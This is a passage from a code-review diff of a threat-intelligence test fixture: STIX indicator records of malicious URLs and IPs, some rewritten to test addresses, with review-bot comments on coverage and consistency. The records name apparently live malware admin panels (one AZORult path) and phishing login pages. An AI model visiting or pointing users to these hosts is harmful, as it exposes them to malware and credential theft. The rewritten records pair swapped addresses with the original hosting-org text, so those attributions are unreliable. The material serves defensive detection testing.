http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-27T02:56:02.067Z"} {"created":"2020-01-27T02:56:03.948Z","description":"TS ID: 55259870672; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--ee8c37a6-cb8b-478c-b527-2506637ceb34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:03.948Z","name":"mal_url: http://turams.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://turams.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:03.948Z"} {"created":"2020-01-27T02:56:05.787Z","description":"TS ID: 55259870662; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--fd1feff8-dcc5-429a-953d-0bb80951bf5c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-27T02:56:05.787Z","name":"mal_url: http://turames8.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://turames8.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:05.787Z"} {"created":"2020-01-27T02:56:17.615Z","description":"TS ID: 55259870820; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--f69535bc-4059-445d-90b0-1df8498137a4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:17.615Z","name":"mal_url: http://2maga.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://2maga.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:17.615Z"} 
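Review bot: After the rewrite, consecutive indicators in this hunk (`mal_url: http://89.160.20.156/login` for TS IDs 55259870822 and 55259870657) carry identical `name` and `pattern` values, so the fixture no longer distinguishes events by observable; if the pipeline's expected-output file or any dedup/enrichment step keys on the extracted address, the test silently loses coverage it previously had. The `description` text still names the original hosting org (`Org: Friendhosting LTD`, `Org: Transit Telecom LLC`) while the observable was swapped, which a reader of the sample may take as a real attribution. If the supported test set contains more than one address, spreading the rewritten records across two or three of them keeps per-event extraction observable in the expected output; the same applies to the `@@ -171,7 +171,7 @@` hunk below, where the `mal_ip` record now matches the `mal_url` records above it.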
@@ -171,7 +171,7 @@ {"created":"2020-01-27T02:56:41.874Z","description":"TS ID: 55259870674; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--9a797de6-1aa1-4f5c-b40a-c65699117f57","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-01-27T02:56:41.874Z","name":"mal_url: http://roninrol.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://roninrol.info/login']","type":"indicator","valid_from":"2020-01-27T02:56:41.874Z"} {"created":"2020-01-27T02:56:49.344Z","description":"TS ID: 55259870678; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--7a094f4c-d57d-4bad-9258-a19210782331","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:49.344Z","name":"mal_url: http://ramesvet8.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ramesvet8.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:49.344Z"} {"created":"2020-01-27T02:56:53.905Z","description":"TS ID: 55259870709; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--6de4e500-4c56-4288-aa8f-b092f194ff78","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:53.905Z","name":"mal_url: http://meropsi.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://meropsi.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:53.905Z"} -{"created":"2020-01-27T02:57:06.376Z","description":"TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: 
CyberCrime","id":"indicator--c4c00824-3ceb-4b3c-89a2-77d3920aacdb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:57:06.376Z","name":"mal_ip: 91.90.192.161","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.90.192.161']","type":"indicator","valid_from":"2020-01-27T02:57:06.376Z"} +{"created":"2020-01-27T02:57:06.376Z","description":"TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--c4c00824-3ceb-4b3c-89a2-77d3920aacdb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:57:06.376Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-27T02:57:06.376Z"} {"created":"2020-01-27T02:57:09.474Z","description":"TS ID: 55259870721; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--0e9df710-3a24-4070-9576-f3081708cd67","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:57:09.474Z","name":"mal_url: http://meropa.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://meropa.site/login']","type":"indicator","valid_from":"2020-01-27T02:57:09.474Z"} {"created":"2020-01-27T02:57:12.314Z","description":"TS ID: 55259870801; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--4d6b9fe5-43f3-42af-b7c0-171052280208","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:57:12.314Z","name":"mal_url: 
http://5umaga.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5umaga.site/login']","type":"indicator","valid_from":"2020-01-27T02:57:12.314Z"} {"created":"2020-01-27T02:57:12.344Z","description":"TS ID: 55259870773; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--50a15dd9-290b-4240-9245-bbe259bcc4c7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:57:12.344Z","name":"mal_url: http://dufre1.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dufre1.site/login']","type":"indicator","valid_from":"2020-01-27T02:57:12.344Z"} 
@@ -182,24 +182,24 @@ {"created":"2020-01-28T02:58:26.492Z","description":"TS ID: 55263242014; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--15b60240-37eb-41c9-9e66-872f19406f6d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-28T02:58:26.492Z","name":"mal_url: http://la6e51ed.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://la6e51ed.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-28T02:58:26.492Z"} {"created":"2020-01-28T02:58:26.52Z","description":"TS ID: 55263241842; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--6a3a7dfd-7dd0-4b5b-b614-b09f20ae34f3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-01-28T02:58:26.52Z","name":"mal_url: http://209.250.247.253/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://209.250.247.253/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:58:26.52Z"} {"created":"2020-01-28T02:58:43.041Z","description":"TS ID: 55263242045; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--d2de10c5-aaee-4c32-ac0c-0d17ea9c7caf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-28T02:58:43.041Z","name":"mal_url: http://footlooking.kl.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://footlooking.kl.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:58:43.041Z"} -{"created":"2020-01-28T02:58:43.095Z","description":"TS ID: 55263242017; iType: mal_ip; State: active; Source: 
CyberCrime","id":"indicator--8391ee32-499a-4390-b81d-5bd14638be82","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-28T02:58:43.095Z","name":"mal_ip: 2.57.184.184","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.57.184.184']","type":"indicator","valid_from":"2020-01-28T02:58:43.095Z"} +{"created":"2020-01-28T02:58:43.095Z","description":"TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8391ee32-499a-4390-b81d-5bd14638be82","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-28T02:58:43.095Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-28T02:58:43.095Z"} {"created":"2020-01-28T02:58:45.172Z","description":"TS ID: 55263242019; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1a91efe1-ff09-49b2-801b-fb815c843976","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-28T02:58:45.172Z","name":"mal_url: http://a0377875.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://a0377875.xsph.ru/login']","type":"indicator","valid_from":"2020-01-28T02:58:45.172Z"} {"created":"2020-01-28T02:58:46.345Z","description":"TS ID: 55263241963; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--9980de5d-7c0e-456a-b2bf-32544fda592b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T02:58:46.345Z","name":"mal_url: 
http://samaaj.org.pk/ofo/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/ofo/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:58:46.345Z"} {"created":"2020-01-28T02:58:54.765Z","description":"TS ID: 55263242018; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--5da6cfdf-c2a5-45d5-857e-110fc26336f4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-28T02:58:54.765Z","name":"mal_url: http://f0390226.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0390226.xsph.ru/login']","type":"indicator","valid_from":"2020-01-28T02:58:54.765Z"} {"created":"2020-01-28T02:58:57.481Z","description":"TS ID: 55263242026; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--5a32ccb0-c749-4286-a606-f3bfe9a61084","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T02:58:57.481Z","name":"mal_url: http://samaaj.org.pk/justices/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/justices/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:58:57.481Z"} -{"created":"2020-01-28T02:59:19.105Z","description":"TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--c26773dc-80be-48c8-98fd-409174bfd0e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-01-28T02:59:19.105Z","name":"mal_url: http://193.142.59.3/teejay/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://193.142.59.3/teejay/logs/omc.php']","type":"indicator","valid_from":"2020-01-28T02:59:19.105Z"} -{"created":"2020-01-28T02:59:23.53Z","description":"TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime","id":"indicator--642f909c-b1e7-4b17-9786-c01371f5da67","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-01-28T02:59:23.53Z","name":"mal_ip: 88.119.160.89","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '88.119.160.89']","type":"indicator","valid_from":"2020-01-28T02:59:23.53Z"} +{"created":"2020-01-28T02:59:19.105Z","description":"TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--c26773dc-80be-48c8-98fd-409174bfd0e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-01-28T02:59:19.105Z","name":"mal_url: http://89.160.20.156/teejay/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/teejay/logs/omc.php']","type":"indicator","valid_from":"2020-01-28T02:59:19.105Z"} +{"created":"2020-01-28T02:59:23.53Z","description":"TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime","id":"indicator--642f909c-b1e7-4b17-9786-c01371f5da67","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-01-28T02:59:23.53Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-28T02:59:23.53Z"} {"created":"2020-01-28T02:59:26.887Z","description":"TS ID: 55263242013; iType: mal_url; State: active; Source: 
CyberCrime","id":"indicator--b50c1f06-f68e-4842-a1ac-cddef3c2ff05","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-28T02:59:26.887Z","name":"mal_url: http://ld7cad07.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld7cad07.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-28T02:59:26.887Z"} -{"created":"2020-01-28T02:59:27.047Z","description":"TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--ab7dae9a-3218-40dd-984c-a928336e1ccb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-38"],"modified":"2020-01-28T02:59:27.047Z","name":"mal_ip: 162.219.248.137","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.219.248.137']","type":"indicator","valid_from":"2020-01-28T02:59:27.047Z"} -{"created":"2020-01-28T02:59:34.735Z","description":"TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--fc149a8c-3d46-47f7-b0c2-9764d7291336","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-29"],"modified":"2020-01-28T02:59:34.735Z","name":"mal_url: http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-28T02:59:34.735Z"} +{"created":"2020-01-28T02:59:27.047Z","description":"TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: 
CyberCrime","id":"indicator--ab7dae9a-3218-40dd-984c-a928336e1ccb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-38"],"modified":"2020-01-28T02:59:27.047Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-28T02:59:27.047Z"} +{"created":"2020-01-28T02:59:34.735Z","description":"TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--fc149a8c-3d46-47f7-b0c2-9764d7291336","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-29"],"modified":"2020-01-28T02:59:34.735Z","name":"mal_url: http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-28T02:59:34.735Z"} {"created":"2020-01-28T02:59:34.772Z","description":"TS ID: 55263241981; iType: mal_url; State: active; Org: Hostgator Asian Operations Division.; Source: CyberCrime","id":"indicator--167c21ca-7d6b-455c-954a-91a5f036616d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-28T02:59:34.772Z","name":"mal_url: http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-28T02:59:34.772Z"} {"created":"2020-01-28T02:59:39.12Z","description":"TS ID: 55263241978; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: 
CyberCrime","id":"indicator--8a35f477-32b2-4735-9e85-743115f1e83f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T02:59:39.12Z","name":"mal_url: http://samaaj.org.pk/Elvis/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/Elvis/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:59:39.12Z"} {"created":"2020-01-28T02:59:54.142Z","description":"TS ID: 55263242015; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--efcb1909-e772-4001-a96c-97c293baa98d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-28T02:59:54.142Z","name":"mal_url: http://l3b57852.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l3b57852.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-28T02:59:54.142Z"} {"created":"2020-01-28T02:59:54.166Z","description":"TS ID: 55263241966; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--b5c97605-a434-4b73-a655-acc88db57cb7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T02:59:54.166Z","name":"mal_url: http://samaaj.org.pk/fk/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/fk/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:59:54.166Z"} -{"created":"2020-01-28T02:59:54.193Z","description":"TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--10690da4-ed16-4fac-bae7-25a1b17db17d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-01-28T02:59:54.193Z","name":"mal_url: 
http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php']","type":"indicator","valid_from":"2020-01-28T02:59:54.193Z"} -{"created":"2020-01-28T02:59:54.253Z","description":"TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--dff78d62-6939-4d47-a5b3-0c275a472f7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-28T02:59:54.253Z","name":"mal_ip: 82.118.22.36","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '82.118.22.36']","type":"indicator","valid_from":"2020-01-28T02:59:54.253Z"} +{"created":"2020-01-28T02:59:54.193Z","description":"TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--10690da4-ed16-4fac-bae7-25a1b17db17d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-01-28T02:59:54.193Z","name":"mal_url: http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php']","type":"indicator","valid_from":"2020-01-28T02:59:54.193Z"} +{"created":"2020-01-28T02:59:54.253Z","description":"TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--dff78d62-6939-4d47-a5b3-0c275a472f7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-28T02:59:54.253Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-28T02:59:54.253Z"} {"created":"2020-01-28T03:00:08.397Z","description":"TS ID: 55263242037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--c1f7d2e7-4186-47c6-a29b-cdb9bb524732","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-28T03:00:08.397Z","name":"mal_url: http://j1034033.myjino.ru/laskovo/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1034033.myjino.ru/laskovo/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:08.397Z"} -{"created":"2020-01-28T03:00:08.446Z","description":"TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime","id":"indicator--2ffd18da-452a-462b-a264-4c457564de62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-28T03:00:08.446Z","name":"mal_url: http://85.204.74.152/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.74.152/xcool!/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:08.446Z"} +{"created":"2020-01-28T03:00:08.446Z","description":"TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime","id":"indicator--2ffd18da-452a-462b-a264-4c457564de62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-28T03:00:08.446Z","name":"mal_url: http://89.160.20.156/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://89.160.20.156/xcool!/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:08.446Z"} {"created":"2020-01-28T03:00:22.832Z","description":"TS ID: 55263242001; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--bdb1bbc0-4cfe-484b-8c99-22ff164e345d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T03:00:22.832Z","name":"mal_url: http://samaaj.org.pk/ejima/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/ejima/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:22.832Z"} {"created":"2020-01-28T03:00:23.929Z","description":"TS ID: 55263241843; iType: mal_url; State: active; Org: Saginaw Valley State University; Source: CyberCrime","id":"indicator--b708bbd4-d0f4-406e-926e-086fd1bd096e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-28T03:00:23.929Z","name":"mal_url: http://155.138.222.174/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://155.138.222.174/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:23.929Z"} {"created":"2020-01-28T03:00:30.838Z","description":"TS ID: 55263241974; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--384ff3f4-d643-4b23-ad90-9b4fa7524db8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T03:00:30.838Z","name":"mal_url: http://samaaj.org.pk/emp/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/emp/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:30.838Z"} 
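Review bot: Two public addresses embedded in URLs survive this hunk as context lines — `http://209.250.247.253/panel/admin.php` (the Choopa record near the top) and `http://155.138.222.174/panel/admin.php` (the Saginaw Valley record at the end) — while the same hunk does rewrite URL-embedded IPs in the teejay, azorult and xcool records, so if the supported-subset rule is meant to cover IPs inside `url:value` patterns these two look missed. The ColoCrossing record is also the only replaced value that uses `192.168.238.10` rather than `89.160.20.156`; if both are in the permitted set this is fine, but a single test address throughout would make the fixture easier to grep and keep consistent. Every `mal_ip` indicator in this hunk and in the `@@ -214,7 +214,7 @@` hunk now carries the identical address, so the expected-output file for this sample presumably needs regenerating in the same change, and any pipeline assertion that relied on distinct `threat.indicator.ip` values per record should be checked. The `Org:` text in each `description` no longer corresponds to the address, which is harmless for a fixture but worth knowing when reading test output.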
@@ -214,7 +214,7 @@ {"created":"2020-01-29T03:00:38.721Z","description":"TS ID: 55266538999; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--42f95e09-bad2-4055-bf72-fd3d1f26a173","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:00:38.721Z","name":"mal_url: http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:00:38.721Z"} {"created":"2020-01-29T03:00:51.527Z","description":"TS ID: 55266539012; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--b9eafbc4-77e3-4b9b-bd34-a15681f0bbec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-29T03:00:51.527Z","name":"mal_url: http://corpcougar.com/me/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/me/32/panel/admin.php']","type":"indicator","valid_from":"2020-01-29T03:00:51.527Z"} {"created":"2020-01-29T03:01:05.442Z","description":"TS ID: 55266539004; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--9a6acfec-ffa7-47c7-8176-7dbaca7b379f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:01:05.442Z","name":"mal_url: http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:01:05.442Z"} -{"created":"2020-01-29T03:01:13.933Z","description":"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: 
